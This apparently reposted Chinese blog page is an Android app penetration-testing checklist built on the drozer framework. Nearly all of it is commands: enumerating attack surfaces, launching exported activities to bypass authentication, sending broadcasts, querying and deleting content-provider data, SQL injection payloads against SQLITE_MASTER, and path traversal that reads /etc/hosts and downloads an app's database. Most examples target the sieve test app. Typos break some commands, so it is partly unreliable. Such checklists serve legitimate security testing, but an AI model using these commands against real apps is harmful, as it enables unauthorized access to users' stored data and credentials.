apk-checklist

来源:互联网 发布:js拼接字符串逗号隔开 编辑:程序博客网 时间:2024/06/10 14:00
adb forward tcp:31415 tcp:31415
C:\Program Files\drozer
drozer console connect 或 C:\drozer\drozer.bat console connect
E:\APK\adt-bundle-windows-x86_64-20140702\sdk\tools
获取apk信息
  ?1)查找终端设备所有APK信息
             Run app.packege.list –f过滤信息
?(2)具体查看某个APK信息
             Run app.package.info –a apk名
?(3)查找APK存在的攻击面(activity、contentprovider、service)
             Run app.package.attacksurface  apk名


绕过Activity鉴权
?(1)收集Activity的信息进行收集,查找暴露的Activity
             Run app.activity.info –a apk包名
   (2)构造intent信息绕过鉴权直接运行Activity
           Run app.activity.start –-componentcom.mwr.example.sieve包名

dz> run app.activity.start –component com.isi.testapp com.isi.testapp.Welcome




dz> run  app.broadcast.info -a  com.xxx.activity -i
dz> run app.broadcast.send --component 包名 --action android.intent.action.XXX
#空action情况  
 run app.broadcast.send --component  包名 广播名  
dz> run app.broadcast.send --component  com.xxx.activity com.xxx.lock.MyExitReceiver  
dz> run app.broadcast.send --component  com.xxx.activity com.xxx.lock.LockScreenReceiver  
#空extras情况  
dz> run app.broadcast.send --action wisorg.intent.action.PUSH_MESSAGE 


利用ContentProvider攻击
?(1)收集ContentProvider的信息进行收集,查找暴露的ContentProvider
    Run app.provider.info –a apk包名
?(2)发现暴露的ContentProvider后,可以对数据库进行探测。探测出可以查询的URI
    Run scanner.provider.finduris –a apk包名
?(3)查看数据库中的内容
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
    Run app.provider.query URI –vertical
?(4)对数据库表进行插入操作
    Run app.provider.insert URI对应数据表中的字段
?(5)对数据库表进行删除操作
    Run app.provider.delete URI–-selection “条件”


SQL注入
?(1)查看URI对应的数据库表
    Run app.provider.query URI–-projection “ ‘ ”
    Run app.provider.query URI–-selection “ ‘ ”
?(2)可以通过返回的错误信息展示出改Content准备执行的语句,获取数据库中的信息
    Run app.provider.query URI–projection “* From SQLITE_MASTER WHERE type=‘table’;--”
    Run app.provider.query URI–-selection “_id = ?”




检测sql注入和目录遍历
dz> run scanner.provider.injection -a com.mwr.example.sieve
dz> run scanner.provider.traversal -a com.mwr.example.sieve


遍历下载文件
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sie  
ve/databases/database.db /home/user/database.db


利用dz进行开启或者权限提升命令
dz> run app.service.info -a com.mwr.example.sieve
dz> run app.service.start --action xxx --extra xxxx
原创粉丝点击